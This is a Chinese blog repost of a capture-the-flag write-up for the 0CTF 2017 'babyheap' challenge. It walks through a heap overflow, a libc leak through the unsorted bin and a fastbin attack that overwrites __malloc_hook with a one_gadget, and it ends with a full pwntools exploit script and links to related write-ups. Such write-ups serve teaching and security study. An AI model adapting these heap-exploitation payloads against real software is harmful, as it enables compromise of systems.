0ctf2017-babyheap

最新推荐文章于 2023-03-28 10:37:18 发布
最新推荐文章于 2023-03-28 10:37:18 发布
阅读量334 收藏
点赞数
原文链接:http://www.cnblogs.com/hac425/p/9416972.html
版权

前言

又是一道令人怀疑人生的 baby 题。

这道题利用思路非常巧妙,通过 堆溢出fastbin 的机制构造了 information leak, 然后通过 fastbin attack 可以读写 malloc_hook , 然后使用 one_gadgetgetshell.

题目和 idb 文件:https://gitee.com/hac425/blog_data/tree/master/babyheap

正文

程序涉及的结构体 info 的结构如下,可以通过 allocate 功能逆出来
paste image

程序首先 mmap 了一个 随机的地址,用于存放 info table(就是存储info的数组).
paste image

程序的漏洞在于,在 allocate 时程序根据我们的输入 分配 size (size < 0x1000)大小的块。

paste image

然而 在 fill 我们可以写入任意大小的数据

paste image

经典的堆溢出。

问题在于,程序保护全开,而且 info table 的地址还是随机的,而且分配内存时,用的时 calloc 会把内存初始化为0。 所以常用的 大chunk包含小chunk 的信息泄露方式没法使用。

这里通过将 堆溢出 转换为 uaf 来进行信息泄露。

首先分配 多个 chunk

paste image

然后释放 偏移为 1,3的块,它们会进入 fastbin,然后通过部分溢出chunk 2 使得下面那个 fastbinfd 指向下面那个大的块,然后溢出 chunk 4 修改其大小为 0x21bypassfastbin 分配的 check

paste image

然后分配两次我们就能再次拿到这个 大的 chunk, 代码如下

paste image
因为此时我们还没有得到任何 地址,不过各个 chunk 的相对偏移应该是固定的,只要内存的分配顺序,大小没有变化,所以我们可以通过修改 fd 的低字节(小端字节序)就能 使 fd 指向我们的 大chunk

此时我们在把 大chunksize 修复,然后 用 free 刚刚分配的 info,它就会进入 unsorted bin ,此时在 chunk+0x10 处就有了 main_arean 的地址 (unsorted bin的 指针),然后用另外一个 info 打印内容即可 leak.

paste image

费劲千辛万苦我们终于拿到了 libc 的地址,对于这种全开的一般想到的就是修改 __malloc_hook 或者 __free_hook, 问题来了,怎么修改。

又是一种新的思路。我们可以在 __malloc_hook 附近找到合适的位置,进行 fastbin attack.

x/4gx (long long)(&main_arena)-0x40+0xd

paste image
如果以这里为一个 chunk ,这个 chunk 应该被放到 0x70 大小的 fastbin 里面。所以接下来的利用思路就是,构造一个 0x70 大小的 fastbin , 然后溢出修改 fd 到这个 chunk ,分配两次我们就能读写 __malloc_hook了,修改它为 one_gadget即可。

paste image
还有一个小 tips ,之前 uaf 的时候还有一块 0x110chunkunsorted bin, 所以我们需要先把这块内存给分配掉,然后在 进行布局。

最后

one_gadget 一个一个试,与寄存器和内存数据的状态有关。利用 main_arean 的数据进行 fastbin attack 这个 思路强悍。

参考

http://uaf.io/exploitation/2017/03/19/0ctf-Quals-2017-BabyHeap2017.html

exp

from pwn import *
from time import sleep

# x/4gx (long long)(&main_arena)-0x40+0xd

def allocate(size):
    p.recvuntil("Command:")
    p.sendline("1")
    p.recvuntil("Size:")
    p.sendline(str(size))
    sleep(0.1)



def fill(index, content):
    p.recvuntil("Command:")
    p.sendline("2")
    p.recvuntil("Index:")
    p.sendline(str(index))
    p.recvuntil("Size:")
    p.sendline(str(len(content)))
    p.recvuntil("Content:")
    p.send(content)
    sleep(0.1)


def free(index):
    p.recvuntil("Command:")
    p.sendline("3")
    p.recvuntil("Index:")
    p.sendline(str(index))
    sleep(0.1)


def dump(index):
    p.recvuntil("Command:")
    p.sendline("4")
    p.recvuntil("Index:")
    p.sendline(str(index))
    p.recvuntil("Content: \n")



p = process("./0ctfbabyheap")


gdb.attach(p,'''

c

    ''')

pause()
allocate(0x10)  # 0
allocate(0x10)  # 1
allocate(0x10)  # 2
allocate(0x10)  # 3
allocate(0x10)  # 4
allocate(0x100) # 5
allocate(0x10)  # 6
allocate(0x10)  # 7

log.info("allocat some chunk, large in chunk 5")
pause()

free(1)
free(3)

log.info("free 1, 3")
#pause()

payload = "A" *0x10
payload += p64(0)
payload += p64(0x0000000000000021)
payload += "\xa0"
fill(2, payload)
log.info("modify chunk 3 's fastbin ptr, to 0xa0")
#pause()


payload = "A" *0x10
payload += p64(0)
payload += p64(0x0000000000000021)
fill(4, payload)

log.info("modify chunk 5 's size to 0x21 for bypass check")
#pause()

allocate(0x10)  # 1
allocate(0x10)  # 3, get large bin

log.info("now allocate 2 chunk to get the large bin")
#pause()

payload = "A" *0x10
payload += p64(0)
payload += p64(0x00000000000000111)
fill(4, payload)

log.info("resume large chunk size")
#pause()


free(3)
log.info("free the large bin, and our chunk 5 in unsorted bin")
#pause()

dump(5)

addr = u64(p.recv(8))
libc = addr - 0x3c4b78
one_gadget = libc + 0x4526a
log.info("libc: " + hex(libc))
log.info("one_gadget: " + hex(one_gadget))
#pause()


allocate(0x100) # 3

allocate(0x60) # 8
free(8)
payload = "A" *0x10
payload += p64(0)
payload += p64(0x0000000000000071)
payload += p64(libc + 0x3c4aed)   # fake fastbin 0x70 size
fill(7, payload)
log.info("fake fastbin")
#pause()

allocate(0x60) # 8
allocate(0x60) # 9

log.info("now chunk 9 on " + hex(libc + 0x3c4aed))

payload = "A" * 19
payload += p64(one_gadget)  # modify malloc hook
fill(9, payload)

allocate(0x10)

p.interactive()

转载于:https://www.cnblogs.com/hac425/p/9416972.html

weixin_30878361
关注
0ctf 2017 babyheap writeup
jmp esp
03-26 6406
前言坑比的我比赛的时候没有做。。第二天有课,赛后看了看,题目其实没啥太多难度,可能也就是细节上需要注意一下吧题目题目功能简单介绍一下题目功能,因为我本机是用的linux,ida在虚拟机里,ida的复制又不是特别方便,所以我就不复制分析的情况了,具体分析自己做一下练习一下也比较好,就把大致的情况说明一下。首先是主菜单===== Baby Heap in 2017 ===== 1. Allocate 2
BUUCTF-babyheap_0ctf_2017
Rt1Text的博客
11-27 598
标准堆菜单。
0ctf Babyheap 2017
Bill
03-11 6495
0ctf 2017 BabyHeap 1. 题目分析 Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled 如果RELRO: Partial RELRO, 有可能是格式化字符串。 结论...
0ctf_2017_babyheap
u014377094的博客
03-10 488
本人double free+fastbin攻击第一道题,看了两天,好在理解下来不难。 参考传送门[分享]0ctf2017 - babyheap-Pwn-看雪论坛-安全社区|安全招聘|bbs.pediy.com 惯例checksec一下 打开ida 1创建chunk,按1,2依次创建,2往里写,3free掉指定数字chunk,4print出指定chunk内容 不建议跟ida里一些函数死磕,硬读会恶心到,理解就ok。 这里先放exp,读一遍exp咱们再来解释 from pwn import
0ctf_2017_babyheap详解
像初雪一样自由洒落
04-19 4070
本文主要列出0ctf_2017_babyheap的详细过程 主要参考:https://bbs.pediy.com/thread-223461.htm 程序流程 allocate:申请size大小的块 fill:对idx的块,设置size,并填入content free:释放idx的块 dump:打印idx的块内容 漏洞分析 fill中的size可以重新设置,故可以造成堆溢出。 方法:fastbin attack double free泄露libc 【small/large chunk释放,fd和.
0CTF 2017 - babyheap 做题笔记
fa1c4的blog
08-27 613
前言 复现一道 0CTF2017 决赛的pwn题 ctfhub搜索babyheap 分析过程 先分析分配函数 void __fastcall allocate(__int64 a1) { int i; // [rsp+10h] [rbp-10h] int v2; // [rsp+14h] [rbp-Ch] void *v3; // [rsp+18h] [rbp-8h] for ( i = 0; i <= 15; ++i ) { if ( !*(_DWORD *)(24L
babyheap_0_ctf_2017
m0_48127441的博客
04-01 233
漏洞就是劫持程序控制流 先对程序进行分析 alloc(Length) //struct a_malloc{int use_or_not; int Length;void*base;int un_use} ; struct a_malloc malloc_array[16]; fill(任意长度) free(指定块) dump(输出对应chunk的Length)//可以填充任意长度的数据,即可以修改 chunk头 目标 -->劫持程序控制流 --> 把__malloc_hoo...
2021-鹏城实验室网络安全技能大赛-pwn-babyheap 题解
lifanxin的博客
09-28 2499
Write Up文件信息漏洞定位利用分析WP总结 文件信息   本题来自于2021年的鹏程杯比赛的pwn题,题目链接如下:2021-鹏程杯-pwn-babyheap。   该题目主要考查了libc-2.29.so及以上版本的off-by-null利用方式,本题目使用的是libc-2.31.so,知识点学习推荐博客glibc2.29下的off-by-null。同时作为堆题,保护全开,没有可用的show功能函数,必须使用IO_FILE来leak libc,知识点学习推荐博客pwn题堆利用的一些姿势 – IO_F
【pwn】 0ctf_2017_babyheap
Nothing
12-11 655
例行检查 保护全开。 分析程序。在fill函数中存在溢出,通overlap,泄露libc。然后fastbin attack。 from pwn import * io=remote('node3.buuoj.cn',27627) libc=ELF('./libc-2.23.so') def add(size): io.recvuntil('Command: ') io.send...
0CTF-babyheap2017祥讲
Jc
07-26 531
解题思路 1. 查看文件信息,安全机制 2. IDA审计 3. 分析漏洞点 4. 编写EXP 1.基本信息 安全机制 安全机制全部开启了,其实不用慌,对我们做题影响不是很大 运行 ## IDA ...
babyheap_0ctf_2017
weixin_44864859的博客
08-08 356
考察的主要是是堆溢出和fastbin attack。通过这道题巩固了一下基础的堆利用,另外看了其他师傅的wp后发现了新的泄漏libc的方法。嗯。。。严格来说也不能算是新的方法,其本质上是一样的,主要是在构造上有一定的区别。 ​ 先贴一下我的exp: from pwn import * from LibcSearcher import LibcSearcher from sys import argv def ret2libc(leak, func, path=''): if path == '':
[BUUCTF] babyheap_0ctf_2017
最新发布
红叶的博客
03-28 1026
有点回想起当初第一次拿到flag时的感觉,继续加油。 本题考察知识点:**Fastbin Attack** 与 **Unsorted Bin Attack。** 通过使用Fastbin Attack与堆溢出漏洞,我们可以绕过Free后指针置零,从而达到在置零指针后获取堆块fd指针。 通过Unsorted Bin Attack,我们可以泄露Libc地址。 然后我们再使用Fastbin Attack替换__malloc_hook 本文写给自己,也写给跟我一样全网寻找详细解答的师傅们。
buuctf babyheap_0ctf_2017
carol2358的博客
05-06 866
主体函数 我们可以在fill里发现可以任意输入字节 接下来我们就用chunk extend和off by one 图片来自 https://bbs.pediy.com/thread-246786.htm 具体看exp exp: from pwn import * #p=process('./babyheap_0ctf_2017') e=ELF('/lib/x86_64-linux-gn...
BUUCTF(pwn) babyheap_0ctf_2017
半岛铁盒的博客
07-30 272
入门堆题 main菜单 add edit edit,我们写入数据的长度是我们可以自己控制的,我们可以利用这点溢出到另一个堆块上 free,普通的释放chunk的过程 show 利用过程:堆溢出,可以通过重叠堆来泄露libc 分为两步: 第一次先泄露 libc 地址, 第二次利用fastbin attack,修改malloc_hook为one_gadget from pwn import * context.log_level = 'debug' p=remote("node4.buuoj.c
[BUUCTF]PWN——babyheap_0ctf_2017
mcmuyanga的博客
12-23 3168
[BUUCTF]PWN19——babyheap_0ctf_2017 附件 步骤: 例行检查,64位,保护全开 试运行一下程序,看到这个布局菜单,知道了这是一道堆的题目,第一次接触堆的小伙伴可以去看一下这个视频,我也刚接触堆不久,有些地方我也讲不清楚 ida载入,先看一下main函数,做堆题的时候需要将程序给理清楚了,这边的几个选项函数一开始不是如图所示的,我们可以右击给他重新命名一下,为了让我们看的更清楚 add,就是简单的创建一个chunk edit,我们写入数据的长度是我们可以自己控制的,存在堆
babyheap_0ctf_2017 详解
Bi0x的博客
11-24 1712
题目地址: https://buuoj.cn/challenges#babyheap_0ctf_2017 本题为 64 位,以下内容以64位为例 信息收集 弄到题目文件先 checksec 保护全开,那必然就要想办法泄漏出 libc 基地址的偏移量来实现调用其他函数 先逆向一下文件,对于 main 函数大概的构造情况如下 对于 allocate 函数,里面用户输入 size 后根据其大小进行内存分配 这里使用了 calloc函数,其与malloc不同的是分配内存后会把数据.
0ctf2017 babyheap
pondzhang的专栏
12-06 175
from pwn import * #p = process(['./0ctf_2017_babyheap'],env={"LD_PRELOAD":"./libc-2.23.so"}) p = remote("node3.buuoj.cn",26165) elf = ELF('./0ctf_2017_babyheap') libc = ELF("./libc-2.23.so") def Allocate(size): p.recvuntil('Command: ') p.sendl.
WeCTF 2021源代码解析及CTF Write-Up指南
- ctf-writeup: 这个标签可能指向一个或多个参赛者在比赛后的技术分享文章,这些文章将介绍参赛者如何解决特定的CTF挑战题目。 - HTML: 标签提示存在涉及HTML技术的内容,这可能包括网站的前端页面、挑战中涉及到的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值